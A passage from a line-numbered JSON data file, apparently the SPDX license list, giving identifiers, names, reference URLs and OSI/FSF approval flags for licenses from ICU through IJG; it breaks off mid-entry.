3222 "reference": "https://spdx.org/licenses/ICU.html",
3223 "isDeprecatedLicenseId": false,
3224 "detailsUrl": "https://spdx.org/licenses/ICU.json",
3225 "referenceNumber": 259,
3226 "name": "ICU License",
3227 "licenseId": "ICU",
3228 "seeAlso": [
3229 "http://source.icu-project.org/repos/icu/icu/trunk/license.html"
3230 ],
3231 "isOsiApproved": false
3232 },
3233 {
3234 "reference": "https://spdx.org/licenses/FTL.html",
3235 "isDeprecatedLicenseId": false,
3236 "detailsUrl": "https://spdx.org/licenses/FTL.json",
3237 "referenceNumber": 260,
3238 "name": "Freetype Project License",
3239 "licenseId": "FTL",
3240 "seeAlso": [
3241 "http://freetype.fis.uniroma2.it/FTL.TXT",
3242 "http://git.savannah.gnu.org/cgit/freetype/freetype2.git/tree/docs/FTL.TXT",
3243 "http://gitlab.freedesktop.org/freetype/freetype/-/raw/master/docs/FTL.TXT"
3244 ],
3245 "isOsiApproved": false,
3246 "isFsfLibre": true
3247 },
3248 {
3249 "reference": "https://spdx.org/licenses/MirOS.html",
3250 "isDeprecatedLicenseId": false,
3251 "detailsUrl": "https://spdx.org/licenses/MirOS.json",
3252 "referenceNumber": 261,
3253 "name": "The MirOS Licence",
3254 "licenseId": "MirOS",
3255 "seeAlso": [
3256 "https://opensource.org/licenses/MirOS"
3257 ],
3258 "isOsiApproved": true
3259 },
3260 {
3261 "reference": "https://spdx.org/licenses/BSD-2-Clause-NetBSD.html",
3262 "isDeprecatedLicenseId": true,
3263 "detailsUrl": "https://spdx.org/licenses/BSD-2-Clause-NetBSD.json",
3264 "referenceNumber": 262,
3265 "name": "BSD 2-Clause NetBSD License",
3266 "licenseId": "BSD-2-Clause-NetBSD",
3267 "seeAlso": [
3268 "http://www.netbsd.org/about/redistribution.html#default"
3269 ],
3270 "isOsiApproved": false
3271 },
3272 {
3273 "reference": "https://spdx.org/licenses/CC-BY-NC-ND-3.0.html",
3274 "isDeprecatedLicenseId": false,
3275 "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-ND-3.0.json",
3276 "referenceNumber": 263,
3277 "name": "Creative Commons Attribution Non Commercial No Derivatives 3.0 Unported",
3278 "licenseId": "CC-BY-NC-ND-3.0",
3279 "seeAlso": [
3280 "https://creativecommons.org/licenses/by-nc-nd/3.0/legalcode"
3281 ],
3282 "isOsiApproved": false
3283 },
3284 {
3285 "reference": "https://spdx.org/licenses/OSET-PL-2.1.html",
3286 "isDeprecatedLicenseId": false,
3287 "detailsUrl": "https://spdx.org/licenses/OSET-PL-2.1.json",
3288 "referenceNumber": 264,
3289 "name": "OSET Public License version 2.1",
3290 "licenseId": "OSET-PL-2.1",
3291 "seeAlso": [
3292 "http://www.osetfoundation.org/public-license",
3293 "https://opensource.org/licenses/OPL-2.1"
3294 ],
3295 "isOsiApproved": true
3296 },
3297 {
3298 "reference": "https://spdx.org/licenses/CC-BY-NC-ND-2.0.html",
3299 "isDeprecatedLicenseId": false,
3300 "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-ND-2.0.json",
3301 "referenceNumber": 265,
3302 "name": "Creative Commons Attribution Non Commercial No Derivatives 2.0 Generic",
3303 "licenseId": "CC-BY-NC-ND-2.0",
3304 "seeAlso": [
3305 "https://creativecommons.org/licenses/by-nc-nd/2.0/legalcode"
3306 ],
3307 "isOsiApproved": false
3308 },
3309 {
3310 "reference": "https://spdx.org/licenses/SISSL-1.2.html",
3311 "isDeprecatedLicenseId": false,
3312 "detailsUrl": "https://spdx.org/licenses/SISSL-1.2.json",
3313 "referenceNumber": 266,
3314 "name": "Sun Industry Standards Source License v1.2",
3315 "licenseId": "SISSL-1.2",
3316 "seeAlso": [
3317 "http://gridscheduler.sourceforge.net/Gridengine_SISSL_license.html"
3318 ],
3319 "isOsiApproved": false
3320 },
3321 {
3322 "reference": "https://spdx.org/licenses/Wsuipa.html",
3323 "isDeprecatedLicenseId": false,
3324 "detailsUrl": "https://spdx.org/licenses/Wsuipa.json",
3325 "referenceNumber": 267,
3326 "name": "Wsuipa License",
3327 "licenseId": "Wsuipa",
3328 "seeAlso": [
3329 "https://fedoraproject.org/wiki/Licensing/Wsuipa"
3330 ],
3331 "isOsiApproved": false
3332 },
3333 {
3334 "reference": "https://spdx.org/licenses/Zimbra-1.4.html",
3335 "isDeprecatedLicenseId": false,
3336 "detailsUrl": "https://spdx.org/licenses/Zimbra-1.4.json",
3337 "referenceNumber": 268,
3338 "name": "Zimbra Public License v1.4",
3339 "licenseId": "Zimbra-1.4",
3340 "seeAlso": [
3341 "http://www.zimbra.com/legal/zimbra-public-license-1-4"
3342 ],
3343 "isOsiApproved": false
3344 },
3345 {
3346 "reference": "https://spdx.org/licenses/Linux-OpenIB.html",
3347 "isDeprecatedLicenseId": false,
3348 "detailsUrl": "https://spdx.org/licenses/Linux-OpenIB.json",
3349 "referenceNumber": 269,
3350 "name": "Linux Kernel Variant of OpenIB.org license",
3351 "licenseId": "Linux-OpenIB",
3352 "seeAlso": [
3353 "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/drivers/infiniband/core/sa.h"
3354 ],
3355 "isOsiApproved": false
3356 },
3357 {
3358 "reference": "https://spdx.org/licenses/LGPL-3.0.html",
3359 "isDeprecatedLicenseId": true,
3360 "detailsUrl": "https://spdx.org/licenses/LGPL-3.0.json",
3361 "referenceNumber": 270,
3362 "name": "GNU Lesser General Public License v3.0 only",
3363 "licenseId": "LGPL-3.0",
3364 "seeAlso": [
3365 "https://www.gnu.org/licenses/lgpl-3.0-standalone.html",
3366 "https://opensource.org/licenses/LGPL-3.0"
3367 ],
3368 "isOsiApproved": true,
3369 "isFsfLibre": true
3370 },
3371 {
3372 "reference": "https://spdx.org/licenses/OLDAP-2.5.html",
3373 "isDeprecatedLicenseId": false,
3374 "detailsUrl": "https://spdx.org/licenses/OLDAP-2.5.json",
3375 "referenceNumber": 271,
3376 "name": "Open LDAP Public License v2.5",
3377 "licenseId": "OLDAP-2.5",
3378 "seeAlso": [
3379 "http://www.openldap.org/devel/gitweb.cgi?p\u003dopenldap.git;a\u003dblob;f\u003dLICENSE;hb\u003d6852b9d90022e8593c98205413380536b1b5a7cf"
3380 ],
3381 "isOsiApproved": false
3382 },
3383 {
3384 "reference": "https://spdx.org/licenses/AMPAS.html",
3385 "isDeprecatedLicenseId": false,
3386 "detailsUrl": "https://spdx.org/licenses/AMPAS.json",
3387 "referenceNumber": 272,
3388 "name": "Academy of Motion Picture Arts and Sciences BSD",
3389 "licenseId": "AMPAS",
3390 "seeAlso": [
3391 "https://fedoraproject.org/wiki/Licensing/BSD#AMPASBSD"
3392 ],
3393 "isOsiApproved": false
3394 },
3395 {
3396 "reference": "https://spdx.org/licenses/GPL-1.0-or-later.html",
3397 "isDeprecatedLicenseId": false,
3398 "detailsUrl": "https://spdx.org/licenses/GPL-1.0-or-later.json",
3399 "referenceNumber": 273,
3400 "name": "GNU General Public License v1.0 or later",
3401 "licenseId": "GPL-1.0-or-later",
3402 "seeAlso": [
3403 "https://www.gnu.org/licenses/old-licenses/gpl-1.0-standalone.html"
3404 ],
3405 "isOsiApproved": false
3406 },
3407 {
3408 "reference": "https://spdx.org/licenses/BUSL-1.1.html",
3409 "isDeprecatedLicenseId": false,
3410 "detailsUrl": "https://spdx.org/licenses/BUSL-1.1.json",
3411 "referenceNumber": 274,
3412 "name": "Business Source License 1.1",
3413 "licenseId": "BUSL-1.1",
3414 "seeAlso": [
3415 "https://mariadb.com/bsl11/"
3416 ],
3417 "isOsiApproved": false
3418 },
3419 {
3420 "reference": "https://spdx.org/licenses/Adobe-Glyph.html",
3421 "isDeprecatedLicenseId": false,
3422 "detailsUrl": "https://spdx.org/licenses/Adobe-Glyph.json",
3423 "referenceNumber": 275,
3424 "name": "Adobe Glyph List License",
3425 "licenseId": "Adobe-Glyph",
3426 "seeAlso": [
3427 "https://fedoraproject.org/wiki/Licensing/MIT#AdobeGlyph"
3428 ],
3429 "isOsiApproved": false
3430 },
3431 {
3432 "reference": "https://spdx.org/licenses/0BSD.html",
3433 "isDeprecatedLicenseId": false,
3434 "detailsUrl": "https://spdx.org/licenses/0BSD.json",
3435 "referenceNumber": 276,
3436 "name": "BSD Zero Clause License",
3437 "licenseId": "0BSD",
3438 "seeAlso": [
3439 "http://landley.net/toybox/license.html"
3440 ],
3441 "isOsiApproved": true
3442 },
3443 {
3444 "reference": "https://spdx.org/licenses/W3C-19980720.html",
3445 "isDeprecatedLicenseId": false,
3446 "detailsUrl": "https://spdx.org/licenses/W3C-19980720.json",
3447 "referenceNumber": 277,
3448 "name": "W3C Software Notice and License (1998-07-20)",
3449 "licenseId": "W3C-19980720",
3450 "seeAlso": [
3451 "http://www.w3.org/Consortium/Legal/copyright-software-19980720.html"
3452 ],
3453 "isOsiApproved": false
3454 },
3455 {
3456 "reference": "https://spdx.org/licenses/FSFUL.html",
3457 "isDeprecatedLicenseId": false,
3458 "detailsUrl": "https://spdx.org/licenses/FSFUL.json",
3459 "referenceNumber": 278,
3460 "name": "FSF Unlimited License",
3461 "licenseId": "FSFUL",
3462 "seeAlso": [
3463 "https://fedoraproject.org/wiki/Licensing/FSF_Unlimited_License"
3464 ],
3465 "isOsiApproved": false
3466 },
3467 {
3468 "reference": "https://spdx.org/licenses/CC-BY-NC-SA-3.0.html",
3469 "isDeprecatedLicenseId": false,
3470 "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-SA-3.0.json",
3471 "referenceNumber": 279,
3472 "name": "Creative Commons Attribution Non Commercial Share Alike 3.0 Unported",
3473 "licenseId": "CC-BY-NC-SA-3.0",
3474 "seeAlso": [
3475 "https://creativecommons.org/licenses/by-nc-sa/3.0/legalcode"
3476 ],
3477 "isOsiApproved": false
3478 },
3479 {
3480 "reference": "https://spdx.org/licenses/DOC.html",
3481 "isDeprecatedLicenseId": false,
3482 "detailsUrl": "https://spdx.org/licenses/DOC.json",
3483 "referenceNumber": 280,
3484 "name": "DOC License",
3485 "licenseId": "DOC",
3486 "seeAlso": [
3487 "http://www.cs.wustl.edu/~schmidt/ACE-copying.html",
3488 "https://www.dre.vanderbilt.edu/~schmidt/ACE-copying.html"
3489 ],
3490 "isOsiApproved": false
3491 },
3492 {
3493 "reference": "https://spdx.org/licenses/TMate.html",
3494 "isDeprecatedLicenseId": false,
3495 "detailsUrl": "https://spdx.org/licenses/TMate.json",
3496 "referenceNumber": 281,
3497 "name": "TMate Open Source License",
3498 "licenseId": "TMate",
3499 "seeAlso": [
3500 "http://svnkit.com/license.html"
3501 ],
3502 "isOsiApproved": false
3503 },
3504 {
3505 "reference": "https://spdx.org/licenses/MIT-open-group.html",
3506 "isDeprecatedLicenseId": false,
3507 "detailsUrl": "https://spdx.org/licenses/MIT-open-group.json",
3508 "referenceNumber": 282,
3509 "name": "MIT Open Group variant",
3510 "licenseId": "MIT-open-group",
3511 "seeAlso": [
3512 "https://gitlab.freedesktop.org/xorg/app/iceauth/-/blob/master/COPYING",
3513 "https://gitlab.freedesktop.org/xorg/app/xvinfo/-/blob/master/COPYING",
3514 "https://gitlab.freedesktop.org/xorg/app/xsetroot/-/blob/master/COPYING",
3515 "https://gitlab.freedesktop.org/xorg/app/xauth/-/blob/master/COPYING"
3516 ],
3517 "isOsiApproved": false
3518 },
3519 {
3520 "reference": "https://spdx.org/licenses/AMDPLPA.html",
3521 "isDeprecatedLicenseId": false,
3522 "detailsUrl": "https://spdx.org/licenses/AMDPLPA.json",
3523 "referenceNumber": 283,
3524 "name": "AMD\u0027s plpa_map.c License",
3525 "licenseId": "AMDPLPA",
3526 "seeAlso": [
3527 "https://fedoraproject.org/wiki/Licensing/AMD_plpa_map_License"
3528 ],
3529 "isOsiApproved": false
3530 },
3531 {
3532 "reference": "https://spdx.org/licenses/Condor-1.1.html",
3533 "isDeprecatedLicenseId": false,
3534 "detailsUrl": "https://spdx.org/licenses/Condor-1.1.json",
3535 "referenceNumber": 284,
3536 "name": "Condor Public License v1.1",
3537 "licenseId": "Condor-1.1",
3538 "seeAlso": [
3539 "http://research.cs.wisc.edu/condor/license.html#condor",
3540 "http://web.archive.org/web/20111123062036/http://research.cs.wisc.edu/condor/license.html#condor"
3541 ],
3542 "isOsiApproved": false,
3543 "isFsfLibre": true
3544 },
3545 {
3546 "reference": "https://spdx.org/licenses/PolyForm-Noncommercial-1.0.0.html",
3547 "isDeprecatedLicenseId": false,
3548 "detailsUrl": "https://spdx.org/licenses/PolyForm-Noncommercial-1.0.0.json",
3549 "referenceNumber": 285,
3550 "name": "PolyForm Noncommercial License 1.0.0",
3551 "licenseId": "PolyForm-Noncommercial-1.0.0",
3552 "seeAlso": [
3553 "https://polyformproject.org/licenses/noncommercial/1.0.0"
3554 ],
3555 "isOsiApproved": false
3556 },
3557 {
3558 "reference": "https://spdx.org/licenses/BSD-3-Clause-No-Military-License.html",
3559 "isDeprecatedLicenseId": false,
3560 "detailsUrl": "https://spdx.org/licenses/BSD-3-Clause-No-Military-License.json",
3561 "referenceNumber": 286,
3562 "name": "BSD 3-Clause No Military License",
3563 "licenseId": "BSD-3-Clause-No-Military-License",
3564 "seeAlso": [
3565 "https://gitlab.syncad.com/hive/dhive/-/blob/master/LICENSE",
3566 "https://github.com/greymass/swift-eosio/blob/master/LICENSE"
3567 ],
3568 "isOsiApproved": false
3569 },
3570 {
3571 "reference": "https://spdx.org/licenses/CC-BY-4.0.html",
3572 "isDeprecatedLicenseId": false,
3573 "detailsUrl": "https://spdx.org/licenses/CC-BY-4.0.json",
3574 "referenceNumber": 287,
3575 "name": "Creative Commons Attribution 4.0 International",
3576 "licenseId": "CC-BY-4.0",
3577 "seeAlso": [
3578 "https://creativecommons.org/licenses/by/4.0/legalcode"
3579 ],
3580 "isOsiApproved": false,
3581 "isFsfLibre": true
3582 },
3583 {
3584 "reference": "https://spdx.org/licenses/OGL-Canada-2.0.html",
3585 "isDeprecatedLicenseId": false,
3586 "detailsUrl": "https://spdx.org/licenses/OGL-Canada-2.0.json",
3587 "referenceNumber": 288,
3588 "name": "Open Government Licence - Canada",
3589 "licenseId": "OGL-Canada-2.0",
3590 "seeAlso": [
3591 "https://open.canada.ca/en/open-government-licence-canada"
3592 ],
3593 "isOsiApproved": false
3594 },
3595 {
3596 "reference": "https://spdx.org/licenses/CC-BY-NC-SA-3.0-IGO.html",
3597 "isDeprecatedLicenseId": false,
3598 "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-SA-3.0-IGO.json",
3599 "referenceNumber": 289,
3600 "name": "Creative Commons Attribution Non Commercial Share Alike 3.0 IGO",
3601 "licenseId": "CC-BY-NC-SA-3.0-IGO",
3602 "seeAlso": [
3603 "https://creativecommons.org/licenses/by-nc-sa/3.0/igo/legalcode"
3604 ],
3605 "isOsiApproved": false
3606 },
3607 {
3608 "reference": "https://spdx.org/licenses/EFL-1.0.html",
3609 "isDeprecatedLicenseId": false,
3610 "detailsUrl": "https://spdx.org/licenses/EFL-1.0.json",
3611 "referenceNumber": 290,
3612 "name": "Eiffel Forum License v1.0",
3613 "licenseId": "EFL-1.0",
3614 "seeAlso": [
3615 "http://www.eiffel-nice.org/license/forum.txt",
3616 "https://opensource.org/licenses/EFL-1.0"
3617 ],
3618 "isOsiApproved": true
3619 },
3620 {
3621 "reference": "https://spdx.org/licenses/Newsletr.html",
3622 "isDeprecatedLicenseId": false,
3623 "detailsUrl": "https://spdx.org/licenses/Newsletr.json",
3624 "referenceNumber": 291,
3625 "name": "Newsletr License",
3626 "licenseId": "Newsletr",
3627 "seeAlso": [
3628 "https://fedoraproject.org/wiki/Licensing/Newsletr"
3629 ],
3630 "isOsiApproved": false
3631 },
3632 {
3633 "reference": "https://spdx.org/licenses/copyleft-next-0.3.0.html",
3634 "isDeprecatedLicenseId": false,
3635 "detailsUrl": "https://spdx.org/licenses/copyleft-next-0.3.0.json",
3636 "referenceNumber": 292,
3637 "name": "copyleft-next 0.3.0",
3638 "licenseId": "copyleft-next-0.3.0",
3639 "seeAlso": [
3640 "https://github.com/copyleft-next/copyleft-next/blob/master/Releases/copyleft-next-0.3.0"
3641 ],
3642 "isOsiApproved": false
3643 },
3644 {
3645 "reference": "https://spdx.org/licenses/GPL-3.0-or-later.html",
3646 "isDeprecatedLicenseId": false,
3647 "detailsUrl": "https://spdx.org/licenses/GPL-3.0-or-later.json",
3648 "referenceNumber": 293,
3649 "name": "GNU General Public License v3.0 or later",
3650 "licenseId": "GPL-3.0-or-later",
3651 "seeAlso": [
3652 "https://www.gnu.org/licenses/gpl-3.0-standalone.html",
3653 "https://opensource.org/licenses/GPL-3.0"
3654 ],
3655 "isOsiApproved": true,
3656 "isFsfLibre": true
3657 },
3658 {
3659 "reference": "https://spdx.org/licenses/CDLA-Permissive-2.0.html",
3660 "isDeprecatedLicenseId": false,
3661 "detailsUrl": "https://spdx.org/licenses/CDLA-Permissive-2.0.json",
3662 "referenceNumber": 294,
3663 "name": "Community Data License Agreement Permissive 2.0",
3664 "licenseId": "CDLA-Permissive-2.0",
3665 "seeAlso": [
3666 "https://cdla.dev/permissive-2-0"
3667 ],
3668 "isOsiApproved": false
3669 },
3670 {
3671 "reference": "https://spdx.org/licenses/CC-BY-ND-3.0.html",
3672 "isDeprecatedLicenseId": false,
3673 "detailsUrl": "https://spdx.org/licenses/CC-BY-ND-3.0.json",
3674 "referenceNumber": 295,
3675 "name": "Creative Commons Attribution No Derivatives 3.0 Unported",
3676 "licenseId": "CC-BY-ND-3.0",
3677 "seeAlso": [
3678 "https://creativecommons.org/licenses/by-nd/3.0/legalcode"
3679 ],
3680 "isOsiApproved": false
3681 },
3682 {
3683 "reference": "https://spdx.org/licenses/C-UDA-1.0.html",
3684 "isDeprecatedLicenseId": false,
3685 "detailsUrl": "https://spdx.org/licenses/C-UDA-1.0.json",
3686 "referenceNumber": 296,
3687 "name": "Computational Use of Data Agreement v1.0",
3688 "licenseId": "C-UDA-1.0",
3689 "seeAlso": [
3690 "https://github.com/microsoft/Computational-Use-of-Data-Agreement/blob/master/C-UDA-1.0.md",
3691 "https://cdla.dev/computational-use-of-data-agreement-v1-0/"
3692 ],
3693 "isOsiApproved": false
3694 },
3695 {
3696 "reference": "https://spdx.org/licenses/Barr.html",
3697 "isDeprecatedLicenseId": false,
3698 "detailsUrl": "https://spdx.org/licenses/Barr.json",
3699 "referenceNumber": 297,
3700 "name": "Barr License",
3701 "licenseId": "Barr",
3702 "seeAlso": [
3703 "https://fedoraproject.org/wiki/Licensing/Barr"
3704 ],
3705 "isOsiApproved": false
3706 },
3707 {
3708 "reference": "https://spdx.org/licenses/Vim.html",
3709 "isDeprecatedLicenseId": false,
3710 "detailsUrl": "https://spdx.org/licenses/Vim.json",
3711 "referenceNumber": 298,
3712 "name": "Vim License",
3713 "licenseId": "Vim",
3714 "seeAlso": [
3715 "http://vimdoc.sourceforge.net/htmldoc/uganda.html"
3716 ],
3717 "isOsiApproved": false,
3718 "isFsfLibre": true
3719 },
3720 {
3721 "reference": "https://spdx.org/licenses/GPL-2.0-with-classpath-exception.html",
3722 "isDeprecatedLicenseId": true,
3723 "detailsUrl": "https://spdx.org/licenses/GPL-2.0-with-classpath-exception.json",
3724 "referenceNumber": 299,
3725 "name": "GNU General Public License v2.0 w/Classpath exception",
3726 "licenseId": "GPL-2.0-with-classpath-exception",
3727 "seeAlso": [
3728 "https://www.gnu.org/software/classpath/license.html"
3729 ],
3730 "isOsiApproved": false
3731 },
3732 {
3733 "reference": "https://spdx.org/licenses/BitTorrent-1.1.html",
3734 "isDeprecatedLicenseId": false,
3735 "detailsUrl": "https://spdx.org/licenses/BitTorrent-1.1.json",
3736 "referenceNumber": 300,
3737 "name": "BitTorrent Open Source License v1.1",
3738 "licenseId": "BitTorrent-1.1",
3739 "seeAlso": [
3740 "http://directory.fsf.org/wiki/License:BitTorrentOSL1.1"
3741 ],
3742 "isOsiApproved": false,
3743 "isFsfLibre": true
3744 },
3745 {
3746 "reference": "https://spdx.org/licenses/CDL-1.0.html",
3747 "isDeprecatedLicenseId": false,
3748 "detailsUrl": "https://spdx.org/licenses/CDL-1.0.json",
3749 "referenceNumber": 301,
3750 "name": "Common Documentation License 1.0",
3751 "licenseId": "CDL-1.0",
3752 "seeAlso": [
3753 "http://www.opensource.apple.com/cdl/",
3754 "https://fedoraproject.org/wiki/Licensing/Common_Documentation_License",
3755 "https://www.gnu.org/licenses/license-list.html#ACDL"
3756 ],
3757 "isOsiApproved": false
3758 },
3759 {
3760 "reference": "https://spdx.org/licenses/CC-BY-SA-1.0.html",
3761 "isDeprecatedLicenseId": false,
3762 "detailsUrl": "https://spdx.org/licenses/CC-BY-SA-1.0.json",
3763 "referenceNumber": 302,
3764 "name": "Creative Commons Attribution Share Alike 1.0 Generic",
3765 "licenseId": "CC-BY-SA-1.0",
3766 "seeAlso": [
3767 "https://creativecommons.org/licenses/by-sa/1.0/legalcode"
3768 ],
3769 "isOsiApproved": false
3770 },
3771 {
3772 "reference": "https://spdx.org/licenses/ADSL.html",
3773 "isDeprecatedLicenseId": false,
3774 "detailsUrl": "https://spdx.org/licenses/ADSL.json",
3775 "referenceNumber": 303,
3776 "name": "Amazon Digital Services License",
3777 "licenseId": "ADSL",
3778 "seeAlso": [
3779 "https://fedoraproject.org/wiki/Licensing/AmazonDigitalServicesLicense"
3780 ],
3781 "isOsiApproved": false
3782 },
3783 {
3784 "reference": "https://spdx.org/licenses/PostgreSQL.html",
3785 "isDeprecatedLicenseId": false,
3786 "detailsUrl": "https://spdx.org/licenses/PostgreSQL.json",
3787 "referenceNumber": 304,
3788 "name": "PostgreSQL License",
3789 "licenseId": "PostgreSQL",
3790 "seeAlso": [
3791 "http://www.postgresql.org/about/licence",
3792 "https://opensource.org/licenses/PostgreSQL"
3793 ],
3794 "isOsiApproved": true
3795 },
3796 {
3797 "reference": "https://spdx.org/licenses/OFL-1.1.html",
3798 "isDeprecatedLicenseId": false,
3799 "detailsUrl": "https://spdx.org/licenses/OFL-1.1.json",
3800 "referenceNumber": 305,
3801 "name": "SIL Open Font License 1.1",
3802 "licenseId": "OFL-1.1",
3803 "seeAlso": [
3804 "http://scripts.sil.org/cms/scripts/page.php?item_id\u003dOFL_web",
3805 "https://opensource.org/licenses/OFL-1.1"
3806 ],
3807 "isOsiApproved": true,
3808 "isFsfLibre": true
3809 },
3810 {
3811 "reference": "https://spdx.org/licenses/NPL-1.0.html",
3812 "isDeprecatedLicenseId": false,
3813 "detailsUrl": "https://spdx.org/licenses/NPL-1.0.json",
3814 "referenceNumber": 306,
3815 "name": "Netscape Public License v1.0",
3816 "licenseId": "NPL-1.0",
3817 "seeAlso": [
3818 "http://www.mozilla.org/MPL/NPL/1.0/"
3819 ],
3820 "isOsiApproved": false,
3821 "isFsfLibre": true
3822 },
3823 {
3824 "reference": "https://spdx.org/licenses/xinetd.html",
3825 "isDeprecatedLicenseId": false,
3826 "detailsUrl": "https://spdx.org/licenses/xinetd.json",
3827 "referenceNumber": 307,
3828 "name": "xinetd License",
3829 "licenseId": "xinetd",
3830 "seeAlso": [
3831 "https://fedoraproject.org/wiki/Licensing/Xinetd_License"
3832 ],
3833 "isOsiApproved": false,
3834 "isFsfLibre": true
3835 },
3836 {
3837 "reference": "https://spdx.org/licenses/LGPL-2.0-only.html",
3838 "isDeprecatedLicenseId": false,
3839 "detailsUrl": "https://spdx.org/licenses/LGPL-2.0-only.json",
3840 "referenceNumber": 308,
3841 "name": "GNU Library General Public License v2 only",
3842 "licenseId": "LGPL-2.0-only",
3843 "seeAlso": [
3844 "https://www.gnu.org/licenses/old-licenses/lgpl-2.0-standalone.html"
3845 ],
3846 "isOsiApproved": true
3847 },
3848 {
3849 "reference": "https://spdx.org/licenses/zlib-acknowledgement.html",
3850 "isDeprecatedLicenseId": false,
3851 "detailsUrl": "https://spdx.org/licenses/zlib-acknowledgement.json",
3852 "referenceNumber": 309,
3853 "name": "zlib/libpng License with Acknowledgement",
3854 "licenseId": "zlib-acknowledgement",
3855 "seeAlso": [
3856 "https://fedoraproject.org/wiki/Licensing/ZlibWithAcknowledgement"
3857 ],
3858 "isOsiApproved": false
3859 },
3860 {
3861 "reference": "https://spdx.org/licenses/OLDAP-2.2.1.html",
3862 "isDeprecatedLicenseId": false,
3863 "detailsUrl": "https://spdx.org/licenses/OLDAP-2.2.1.json",
3864 "referenceNumber": 310,
3865 "name": "Open LDAP Public License v2.2.1",
3866 "licenseId": "OLDAP-2.2.1",
3867 "seeAlso": [
3868 "http://www.openldap.org/devel/gitweb.cgi?p\u003dopenldap.git;a\u003dblob;f\u003dLICENSE;hb\u003d4bc786f34b50aa301be6f5600f58a980070f481e"
3869 ],
3870 "isOsiApproved": false
3871 },
3872 {
3873 "reference": "https://spdx.org/licenses/APSL-1.0.html",
3874 "isDeprecatedLicenseId": false,
3875 "detailsUrl": "https://spdx.org/licenses/APSL-1.0.json",
3876 "referenceNumber": 311,
3877 "name": "Apple Public Source License 1.0",
3878 "licenseId": "APSL-1.0",
3879 "seeAlso": [
3880 "https://fedoraproject.org/wiki/Licensing/Apple_Public_Source_License_1.0"
3881 ],
3882 "isOsiApproved": true
3883 },
3884 {
3885 "reference": "https://spdx.org/licenses/BSD-3-Clause-LBNL.html",
3886 "isDeprecatedLicenseId": false,
3887 "detailsUrl": "https://spdx.org/licenses/BSD-3-Clause-LBNL.json",
3888 "referenceNumber": 312,
3889 "name": "Lawrence Berkeley National Labs BSD variant license",
3890 "licenseId": "BSD-3-Clause-LBNL",
3891 "seeAlso": [
3892 "https://fedoraproject.org/wiki/Licensing/LBNLBSD"
3893 ],
3894 "isOsiApproved": true
3895 },
3896 {
3897 "reference": "https://spdx.org/licenses/GLWTPL.html",
3898 "isDeprecatedLicenseId": false,
3899 "detailsUrl": "https://spdx.org/licenses/GLWTPL.json",
3900 "referenceNumber": 313,
3901 "name": "Good Luck With That Public License",
3902 "licenseId": "GLWTPL",
3903 "seeAlso": [
3904 "https://github.com/me-shaon/GLWTPL/commit/da5f6bc734095efbacb442c0b31e33a65b9d6e85"
3905 ],
3906 "isOsiApproved": false
3907 },
3908 {
3909 "reference": "https://spdx.org/licenses/LGPL-3.0-only.html",
3910 "isDeprecatedLicenseId": false,
3911 "detailsUrl": "https://spdx.org/licenses/LGPL-3.0-only.json",
3912 "referenceNumber": 314,
3913 "name": "GNU Lesser General Public License v3.0 only",
3914 "licenseId": "LGPL-3.0-only",
3915 "seeAlso": [
3916 "https://www.gnu.org/licenses/lgpl-3.0-standalone.html",
3917 "https://opensource.org/licenses/LGPL-3.0"
3918 ],
3919 "isOsiApproved": true,
3920 "isFsfLibre": true
3921 },
3922 {
3923 "reference": "https://spdx.org/licenses/OGC-1.0.html",
3924 "isDeprecatedLicenseId": false,
3925 "detailsUrl": "https://spdx.org/licenses/OGC-1.0.json",
3926 "referenceNumber": 315,
3927 "name": "OGC Software License, Version 1.0",
3928 "licenseId": "OGC-1.0",
3929 "seeAlso": [
3930 "https://www.ogc.org/ogc/software/1.0"
3931 ],
3932 "isOsiApproved": false
3933 },
3934 {
3935 "reference": "https://spdx.org/licenses/Dotseqn.html",
3936 "isDeprecatedLicenseId": false,
3937 "detailsUrl": "https://spdx.org/licenses/Dotseqn.json",
3938 "referenceNumber": 316,
3939 "name": "Dotseqn License",
3940 "licenseId": "Dotseqn",
3941 "seeAlso": [
3942 "https://fedoraproject.org/wiki/Licensing/Dotseqn"
3943 ],
3944 "isOsiApproved": false
3945 },
3946 {
3947 "reference": "https://spdx.org/licenses/MakeIndex.html",
3948 "isDeprecatedLicenseId": false,
3949 "detailsUrl": "https://spdx.org/licenses/MakeIndex.json",
3950 "referenceNumber": 317,
3951 "name": "MakeIndex License",
3952 "licenseId": "MakeIndex",
3953 "seeAlso": [
3954 "https://fedoraproject.org/wiki/Licensing/MakeIndex"
3955 ],
3956 "isOsiApproved": false
3957 },
3958 {
3959 "reference": "https://spdx.org/licenses/GPL-3.0-only.html",
3960 "isDeprecatedLicenseId": false,
3961 "detailsUrl": "https://spdx.org/licenses/GPL-3.0-only.json",
3962 "referenceNumber": 318,
3963 "name": "GNU General Public License v3.0 only",
3964 "licenseId": "GPL-3.0-only",
3965 "seeAlso": [
3966 "https://www.gnu.org/licenses/gpl-3.0-standalone.html",
3967 "https://opensource.org/licenses/GPL-3.0"
3968 ],
3969 "isOsiApproved": true,
3970 "isFsfLibre": true
3971 },
3972 {
3973 "reference": "https://spdx.org/licenses/BSD-3-Clause-No-Nuclear-License-2014.html",
3974 "isDeprecatedLicenseId": false,
3975 "detailsUrl": "https://spdx.org/licenses/BSD-3-Clause-No-Nuclear-License-2014.json",
3976 "referenceNumber": 319,
3977 "name": "BSD 3-Clause No Nuclear License 2014",
3978 "licenseId": "BSD-3-Clause-No-Nuclear-License-2014",
3979 "seeAlso": [
3980 "https://java.net/projects/javaeetutorial/pages/BerkeleyLicense"
3981 ],
3982 "isOsiApproved": false
3983 },
3984 {
3985 "reference": "https://spdx.org/licenses/GPL-1.0-only.html",
3986 "isDeprecatedLicenseId": false,
3987 "detailsUrl": "https://spdx.org/licenses/GPL-1.0-only.json",
3988 "referenceNumber": 320,
3989 "name": "GNU General Public License v1.0 only",
3990 "licenseId": "GPL-1.0-only",
3991 "seeAlso": [
3992 "https://www.gnu.org/licenses/old-licenses/gpl-1.0-standalone.html"
3993 ],
3994 "isOsiApproved": false
3995 },
3996 {
3997 "reference": "https://spdx.org/licenses/IJG.html",
3998 "isDeprecatedLicenseId": false,
3999 "detailsUrl": "https://spdx.org/licenses/IJG.json",
4000 "referenceNumber": 321,
4001 "name": "Independent JPEG Group License",
4002 "licenseId": "IJG",
4003 "seeAlso": [
4004 "http://dev.w3.org/cvsweb/Amaya/libjpeg/Attic/README?rev\u003d1.2"
